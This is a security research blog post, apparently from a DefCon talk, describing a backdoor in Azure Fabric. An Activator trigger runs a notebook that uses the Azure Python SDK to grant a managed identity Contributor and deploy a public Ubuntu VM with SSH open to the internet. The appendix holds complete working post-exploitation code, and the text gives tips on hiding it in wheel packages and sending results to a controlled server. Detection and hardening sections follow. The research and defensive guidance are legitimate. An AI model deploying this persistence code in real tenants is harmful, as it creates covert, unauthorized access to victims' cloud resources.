Verder naar navigatie Doorgaan naar hoofdinhoud Ga naar de voettekst

Azure Fabric Backdoor With A Twist

door Viktor Gazdag

21 oktober 2025

Intro 

In this blog post will discuss the creation of a backdoor access in Azure Fabric that was presented previously in Las Vegas at the DefCon 33 conference within the Cloud Village by Viktor Gazdag principal security consultant at NCC group. 

A video of the talk can be viewed here:

Azure Fabric is a SaaS based end to end analytics platform that unifies tools and services such as Power BI, Data Lakehouse, data pipeline, Data Warehouse, Data Factory, databases etc into one portal. The main function of the platform is to ingest, process data by engineers applying arbitrary code on data and then build reports from it. 

Proof of Concept Backdoor 

Since the platform is designed for automated data manipulation that requires code execution, there are naturally multiple ways to execute code. These include places like pipeline, user defined function, Spark job and notebook. To introduce another angle and delay code execution to cover presence, a combination of a notebook and Activator is used to run Python code that creates the backdoor access. 

Activator is an event detection and monitoring engine in Fabric that can automatically trigger actions when a condition is met. This service will monitor workspace events such as an item was successfully created or updated. There are additional Fabric events such as Job events, OneLake events and Azure Blob Storage events, but the proof of concept (PoC) backdoor will specifically look for workspace events that happened in one workspace. 

A notebook is an interactive web-based environment that is capable of using different programming languages for data exploration, analyzation and transformation. One of the supported languages is Python. In addition, central public package repositories are also supported. The Azure Python SDK is in the public repository and will help and simplify the amount of code that is required to execute the post-exploitation steps. It is used to log in as a service principal with owner role on a resource group and manage resource in Azure subscription. The activities will include the creation of another service principal, a virtual machine with public IP address and assigned managed identity, plus a network security group allowing SSH from the Internet. 

The PoC does not hide any of the code or the output, instead it prints out the virtual machine IP address, the root username with password and the managed identity name. The notebook allows hiding the input and output of the code, but with a click these can be easily revealed. One method to further hide the content is to create a package in wheel format from the code and upload it as a custom Python package that can be installed and then called within the notebook. Instead of printing the results in the logs, data can be sent to a controlled web server. 

By default, the notebook is running in the name of the user. If you want to use managed identity or service principal, you have to enable and configure it. Fabric then takes care of the managed identity and its lifecycle. That means if you want to access and modify resources outside of Fabric then your user or managed identity requires additional permissions as well. 

For the next sections, we will discuss the components of the backdoor and some of the details of how to use or what the Azure Python SDK is doing. 

Components of The Backdoor 

The service principal component is not strictly part of the backdoor as it is outside of Fabric, but it is required to create the virtual machine and other resources. You can look for and reuse existing service principals if they have the necessary permissions to create the resources you want. In this case, the service principal has owner role on the resource group itself. 

It is possible to use an already available notebook that runs the Azure Python SDK code and then just add the code to it or creating a new one and bury it deep down in a folder structure. By default, the notebook is running in the name of the user who created. That’s the reason the code uses service principal with a role. 

The executed code in the notebook is using Python and Azure Python SDK. It creates the following resources in an existing resource group: virtual network, subnet, network interface, virtual machine with Ubuntu Linux operating system, operating system login credentials for the virtual machine, disk, network security group, managed identity and service principal. It also registers providers if it is a first time the service was used. Some of the functions also requires waiting in to be finished, otherwise it will raise an exception. Furthermore, it will assign the contributor role both to the managed identity and service principal. The blog post will discuss more details with code examples to help understand how to use the SDK in a different section. 

Activator is used for event monitoring and action execution. It looks for specific events if they happened and then trigger an action. The action can be sending an email, run a notebook or execute a Power Automate flow. Also worth mentioning that at the time of the research, there was at least 30 minutes of delay (based on observation) between the event of an item created and show up in the Activator monitoring menu. For the PoC we use all the workspace event items that happens in one specific workspace and then action will execute a notebook containing the backdoor code. 

Lastly, permissions. The Contributor role on the workspace is the minimum required permission to create an Activator. Any additional Entra ID or Azure permissions are depending on the activities that the code is performing (key vault access, storage access, turn off logging etc). In this case an owner role at the resource group level for the service principal is required as user management and role assignment is done. 

Usage of Azure Python SDK 

In this section some parts of the code are discussed to help understand what and how to do things. The complete source code of the PoC is available at the end of the article. Also worth noting that the PoC code was generated using artificial intelligence, by a large language model (LLM) tool (Microsoft CoPilot) by applying iterations and tested in Azure test environment. 

The Azure Python SDK helps creating and managing resources in Azure. One of the packages is the Azure Identity that helps with Entra ID authentication. Other packages from the SDK like azure-mgmt-compute or azure-mgmt-network are for easier resources creation such as virtual machine, virtual disk or network security group. 

The following Azure Python SDK packages are installed with the !pip3 install command. This will locally install the Python package in the environment by opening an operating system shell: 

!pip3 install azure-mgmt-msi 
!pip3 install azure-mgmt-authorization 
!pip3 install msrest 
!pip3 install azure-mgmt-common 
!pip3 install azure-mgmt-nspkg 
!pip3 install azure-mgmt-compute 
!pip3 install azure-mgmt-resource 
!pip3 install azure-mgmt-network 
!pip3 install azure-identity  

Then classes are imported which then will be used for creating the various resources in Azure and Entra ID:

 
from azure.identity import ClientSecretCredential 
from azure.mgmt.msi import ManagedServiceIdentityClient 
from azure.mgmt.resource import ResourceManagementClient 
from azure.mgmt.compute import ComputeManagementClient 
from azure.mgmt.network import NetworkManagementClient 
from azure.mgmt.authorization import AuthorizationManagementClient 
from azure.mgmt.authorization.models import RoleAssignmentCreateParameters 
from azure.core.exceptions import HttpResponseError  

As an example, the azure.identity class is used for creating the login credentials, while the azure.mgmt.compute class is responsible for creating the virtual machine resource.

The ClientSecretCredential class is used for creating the login credential object to log in with a service principal. This is important, because a different class is used for user login.

 
credential = ClientSecretCredential( 

        tenant_id=tenant_id, 
        client_id=client_id, 
        client_secret=client_secret 

    ) 

The values for each property are read from the environment variables in the operating system like this:

 
os.environ["AZURE_TENANT_ID"] = "TenantID" 
os.environ["AZURE_CLIENT_ID"] = "ClientID" 
os.environ["AZURE_CLIENT_SECRET"] = "Secret" 

The credentials object is used in the different Azure clients like compute, network or managed service to create the resources itself. The following code snippet is an example of using a resource group or creating it if not exist:

 
try: 

        rg = resource_client.resource_groups.get(resource_group_name) 
        print(f"Using existing resource group: {resource_group_name}") 
        return rg 

    except HttpResponseError: 

        print(f"Creating resource group: {resource_group_name}") 
        return resource_client.resource_groups.create_or_update( 

            resource_group_name, 
            {"location": location} 

The following code snippet shows how the network_client from the Azure Python SDK creates a network security group that allows SSH connection from the Internet to anyone if it does not exist:

 
def create_nsg(network_client, resource_group_name, location, nsg_name): 

    """Create network security group with SSH access from the internet.""" 

    try: 

        nsg = network_client.network_security_groups.get(resource_group_name, nsg_name) 
        print(f"Using existing NSG: {nsg_name}") 
        return nsg 

    except HttpResponseError: 

        print(f"Creating NSG: {nsg_name} with SSH access rule") 
        nsg_params = { 

            'location': location, 
            'security_rules': [ 

                { 

                    'name': 'AllowSSH', 
                    'protocol': 'Tcp', 
                    'source_port_range': '*', 
                    'destination_port_range': '22', 
                    'source_address_prefix': '*',  # Allow from any source (internet) 
                    'destination_address_prefix': '*', 
                    'access': 'Allow', 
                    'priority': 100, 
                    'direction': 'Inbound', 
                    'description': 'Allow SSH access from the internet' 

                } 

            ] 

        } 

         

        return network_client.network_security_groups.begin_create_or_update( 

            resource_group_name, 
            nsg_name, 
            nsg_params 

        ).result() 

Traces Left Behind

Even though the backdoor can be hidden well in the notebook or in a new Spark environment, there are still traces left behind of its activity. The notebook has a history log of runs, shows when it run and what the output of the executed code was. In addition, every notebook has a resource explorer, which makes the additional 3rd party packages visible. 

Spark environments have a configurable custom library where you can see the uploaded 3rd party packages and should be periodically reviewed. The same periodic review applies to all the Activator’s action. Although there is evidence that the Activator was changed or created, the event name is not explicitly telling this. 

Reviewing and monitoring the subscription and resource group level IAM access and role assignment is a security best practice. This also means, the service principals are periodically reviewed whether they have the correct permissions and roles. 

The Entra ID log contains the creation, modification and log in events of the service principals. This log can be also used in SIEM solutions to alert in any unauthorized modification or login. 

Useful Fabric Settings 

There are two tenant level and one workspace level settings that can help and make an attacker’s life harder in the post exploitation phase as well. These are the “Blocking Internet access”, “Private links for Azure Fabric” and “Workspace outbound access protection” options. The first one blocks all access from the Internet. While the second uses private endpoints for service communications. The last option is block the Internet access at the workspace level which will block the Internet access from the notebook, Spark job definitions, environments, shortcuts and lakehouses. 

Conclusion 

The Azure Python SDK is a useful collection of packages that can be used not just for legitimate automation, but for malicious activities. Post-exploitation activities by using built-in tools like the SDK or notebook can be harder to catch as they look like legitimate activities and use cases. Especially if execution is delayed like in this blog post.

Appendix A – Complete Code of Azure Fabric Backdoor

    #!/usr/bin/env python 

 

import os 
import random 
import string 
from datetime import datetime, timedelta 


from azure.identity import ClientSecretCredential 
from azure.mgmt.msi import ManagedServiceIdentityClient 
from azure.mgmt.resource import ResourceManagementClient 
from azure.mgmt.compute import ComputeManagementClient 
from azure.mgmt.network import NetworkManagementClient 
from azure.mgmt.authorization import AuthorizationManagementClient 
from azure.mgmt.authorization.models import RoleAssignmentCreateParameters 
from azure.core.exceptions import HttpResponseError 


# Service Principal credentials 

os.environ["AZURE_TENANT_ID"] = "TenantID" 
os.environ["AZURE_CLIENT_ID"] = "ClientID" 
os.environ["AZURE_CLIENT_SECRET"] = "Secret" 
os.environ["AZURE_SUBSCRIPTION_ID"] = "SubscriptionID" 
os.environ["AZURE_RESOURCE_GROUP"] = "ResourceGroupName" 
tenant_id = os.environ.get("AZURE_TENANT_ID", "your-tenant-id") 
client_id = os.environ.get("AZURE_CLIENT_ID", "your-client-id") 
client_secret = os.environ.get("AZURE_CLIENT_SECRET", "your-client-secret") 

 
# Azure configuration 

subscription_id = os.environ.get("AZURE_SUBSCRIPTION_ID", "your-subscription-id") 
location = "eastus" 
resource_group_name = "Fabric2" 
 

# VM configuration 

vm_name = "linux-demo-vm" 
vm_username = "azureuser" 
vm_password = "".join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(16)) 
managed_identity_name = "demo-msi" 


# Role definition ID for Contributor role 

contributor_role_id = "b24988ac-6180-42a0-ab88-20f7382dd24c" 
 

def main(): 

    # Create client credential 
    credential = ClientSecretCredential( 

        tenant_id=tenant_id, 
        client_id=client_id, 
        client_secret=client_secret 

    ) 

     
    # Create clients 

    resource_client = ResourceManagementClient(credential, subscription_id) 
    msi_client = ManagedServiceIdentityClient(credential, subscription_id) 
    compute_client = ComputeManagementClient(credential, subscription_id) 
    network_client = NetworkManagementClient(credential, subscription_id) 
    auth_client = AuthorizationManagementClient(credential, subscription_id) 

     
    # Register required resource providers 

    register_providers(resource_client) 

     
    # Create or check resource group 

    create_resource_group(resource_client, resource_group_name, location) 
     

    # Create managed identity 

    identity = create_managed_identity(msi_client, resource_group_name, managed_identity_name, location) 
    print(f"Created managed identity: {identity.name} with ID: {identity.id}") 

     
    # Assign Contributor role to the managed identity 

    role_assignment = assign_role( 

        auth_client, 
        identity.principal_id, 
        contributor_role_id, 

        f"/subscriptions/{subscription_id}/resourceGroups/{resource_group_name}" 

    ) 

    print(f"Assigned Contributor role to managed identity") 

     
    # Create network resources 

    vnet_name = f"{vm_name}-vnet" 
    subnet_name = "default" 
    nic_name = f"{vm_name}-nic" 
    ip_name = f"{vm_name}-ip" 
    nsg_name = f"{vm_name}-nsg" 


    vnet, subnet = create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name) 
    nsg = create_nsg(network_client, resource_group_name, location, nsg_name) 
    nic = create_nic(network_client, resource_group_name, location, nic_name, subnet.id, ip_name) 

     

    # Create Linux VM with managed identity 

    vm = create_linux_vm( 
        compute_client, 
        resource_group_name, 
        location, 
        vm_name, 
        nic.id, 
        vm_username, 
        vm_password, 
        identity.id 

    ) 

     

    # Get the public IP address for SSH access 

    ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name) 

     
    print("\n" + "="*50) 
    print(f"DEPLOYMENT COMPLETED SUCCESSFULLY") 
    print("="*50) 
    print(f"VM Name: {vm_name}") 
    print(f"Username: {vm_username}") 
    print(f"Password: {vm_password}")  # In production, use a more secure way to handle passwords 
    print(f"SSH Command: ssh {vm_username}@{ip_info.ip_address}") 
    print(f"Managed Identity: {managed_identity_name}") 
    print("="*50) 

 

 
def register_providers(resource_client): 

    """Register necessary Azure resource providers.""" 
    providers_to_register = [ 

        "Microsoft.ManagedIdentity", 
        "Microsoft.Compute", 
        "Microsoft.Network", 
        "Microsoft.Authorization" 

    ] 

     
    for provider in providers_to_register: 

        print(f"Registering provider: {provider}") 
        resource_client.providers.register(provider) 
        # Note: Registration can take time to complete. In a production scenario, 
        # you might want to poll for completion. 

 


def create_resource_group(resource_client, resource_group_name, location): 

    """Create a resource group if it doesn't exist.""" 

    try: 

        rg = resource_client.resource_groups.get(resource_group_name) 
        print(f"Using existing resource group: {resource_group_name}") 
        return rg 

    except HttpResponseError: 

        print(f"Creating resource group: {resource_group_name}") 
        return resource_client.resource_groups.create_or_update( 

            resource_group_name, 

            {"location": location} 

        ) 

 

 
def create_managed_identity(msi_client, resource_group_name, identity_name, location): 

    """Create a user-assigned managed identity.""" 

    try: 

        return msi_client.user_assigned_identities.get(resource_group_name, identity_name) 

    except HttpResponseError: 

        # Create the managed identity 
        identity = msi_client.user_assigned_identities.create_or_update( 

            resource_group_name, 
            identity_name, 
            {"location": location} 

        ) 

         
        # Add a small delay to allow for replication 
        print("Waiting for managed identity to propagate...") 
        import time 
        time.sleep(30)  # Wait 30 seconds for replication 

         

        return identity 

 


def assign_role(auth_client, principal_id, role_definition_id, scope): 

    """Assign role to the managed identity.""" 
    # Generate a random UUID for the role assignment name 
    role_assignment_name = f"{principal_id}-{role_definition_id}"[:36] 

     

    role_assignment_params = RoleAssignmentCreateParameters( 

        role_definition_id=f"/subscriptions/{subscription_id}/providers/Microsoft.Authorization/roleDefinitions/{role_definition_id}", 
        principal_id=principal_id, 
        principal_type="ServicePrincipal"  # Specify principal type to avoid replication delay issues 

    ) 

     

    try: 

        return auth_client.role_assignments.create( 

            scope=scope, 
            role_assignment_name=role_assignment_name, 
            parameters=role_assignment_params 

        ) 

    except HttpResponseError as e: 

        # If role assignment already exists, continue 
        if "already exists" in str(e): 

            print(f"Role assignment already exists for principal {principal_id}") 

            return None 

        raise 

 
 

def create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name): 

    """Create virtual network and subnet.""" 

    try: 

        vnet = network_client.virtual_networks.get(resource_group_name, vnet_name) 
        subnet = network_client.subnets.get(resource_group_name, vnet_name, subnet_name) 
        print(f"Using existing vnet: {vnet_name} and subnet: {subnet_name}") 

        return vnet, subnet 

    except HttpResponseError: 

        print(f"Creating vnet: {vnet_name} and subnet: {subnet_name}") 
        vnet_params = { 

            'location': location, 
            'address_space': { 

                'address_prefixes': ['10.0.0.0/16'] 

            }, 

            'subnets': [ 

                { 

                    'name': subnet_name, 
                    'address_prefix': '10.0.0.0/24' 

                } 

            ] 

        } 

         

        vnet = network_client.virtual_networks.begin_create_or_update( 

            resource_group_name, 
            vnet_name, 
            vnet_params 

        ).result() 

         

        subnet = network_client.subnets.get( 

            resource_group_name, 
            vnet_name, 
            subnet_name 

        ) 

         

        return vnet, subnet 

 

 
def create_nsg(network_client, resource_group_name, location, nsg_name): 

    """Create network security group with SSH access from the internet.""" 

    try: 

        nsg = network_client.network_security_groups.get(resource_group_name, nsg_name) 
        print(f"Using existing NSG: {nsg_name}") 
        return nsg 

    except HttpResponseError: 

        print(f"Creating NSG: {nsg_name} with SSH access rule") 
        nsg_params = { 

            'location': location, 
            'security_rules': [ 

                { 

                    'name': 'AllowSSH', 
                    'protocol': 'Tcp', 
                    'source_port_range': '*', 
                    'destination_port_range': '22', 
                    'source_address_prefix': '*',  # Allow from any source (internet) 
                    'destination_address_prefix': '*', 
                    'access': 'Allow', 
                    'priority': 100, 
                    'direction': 'Inbound', 
                    'description': 'Allow SSH access from the internet' 

                } 

            ] 

        } 

         

        return network_client.network_security_groups.begin_create_or_update( 

            resource_group_name, 
            nsg_name, 
            nsg_params 

        ).result() 

 

 
def create_nic(network_client, resource_group_name, location, nic_name, subnet_id, ip_name): 

    """Create network interface with public IP and associate with NSG.""" 

    try: 

        nic = network_client.network_interfaces.get(resource_group_name, nic_name) 
        print(f"Using existing NIC: {nic_name}") 
        return nic 

    except HttpResponseError: 

        print(f"Creating NIC: {nic_name} with public IP: {ip_name}") 

         

        # Create public IP 
        public_ip_params = { 

            'location': location, 
            'sku': { 

                'name': 'Standard' 

            }, 

            'public_ip_allocation_method': 'Static', 
            'public_ip_address_version': 'IPv4' 

        } 

         

        public_ip = network_client.public_ip_addresses.begin_create_or_update( 

            resource_group_name, 
            ip_name, 
            public_ip_params 

        ).result() 


        # Get NSG 

        nsg_name = f"{vm_name}-nsg" 

        try: 

            nsg = network_client.network_security_groups.get(resource_group_name, nsg_name) 

        except HttpResponseError: 

            # Create NSG if it doesn't exist 

            nsg = create_nsg(network_client, resource_group_name, location, nsg_name) 

         

        # Create NIC with NSG associated 

        nic_params = { 

            'location': location, 
            'ip_configurations': [ 

                { 

                    'name': 'ipconfig1', 
                    'subnet': { 

                        'id': subnet_id 

                    }, 

                    'public_ip_address': { 

                        'id': public_ip.id 

                    } 

                } 

            ], 

            'network_security_group': { 

                'id': nsg.id 

            } 

        } 

         

        nic = network_client.network_interfaces.begin_create_or_update( 

            resource_group_name, 
            nic_name, 
            nic_params 

        ).result() 

         

        # Once NIC is created, print the public IP address for SSH access 

        ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name) 
        print(f"VM will be accessible via SSH at: {ip_info.ip_address}") 
         

        return nic 

 

 
def create_linux_vm(compute_client, resource_group_name, location, vm_name, nic_id,  

                    admin_username, admin_password, identity_id): 

    """Create a Linux virtual machine with a managed identity attached.""" 
    print(f"Creating VM: {vm_name}") 

     

    vm_params = { 

        'location': location, 
        'os_profile': { 

            'computer_name': vm_name, 
            'admin_username': admin_username, 
            'admin_password': admin_password, 
            'linux_configuration': { 

                'disable_password_authentication': False 

            } 

        }, 

        'hardware_profile': { 

            'vm_size': 'Standard_DS1_v2' 

        }, 

        'storage_profile': { 

            'image_reference': { 

                'publisher': 'Canonical', 
                'offer': 'UbuntuServer', 
                'sku': '18.04-LTS', 
                'version': 'latest' 

            }, 

            'os_disk': { 

                'create_option': 'FromImage', 
                'managed_disk': { 

                    'storage_account_type': 'Premium_LRS' 

                } 

            } 

        }, 

        'network_profile': { 

            'network_interfaces': [ 

                { 

                    'id': nic_id, 
                    'primary': True 

                } 

            ] 

        }, 

        'identity': { 

            'type': 'UserAssigned', 
            'user_assigned_identities': { 

                identity_id: {} 

            } 

        } 

    } 

     

    return compute_client.virtual_machines.begin_create_or_update( 

        resource_group_name, 
        vm_name, 
        vm_params 

    ).result() 

 

 
if __name__ == "__main__": 
    main()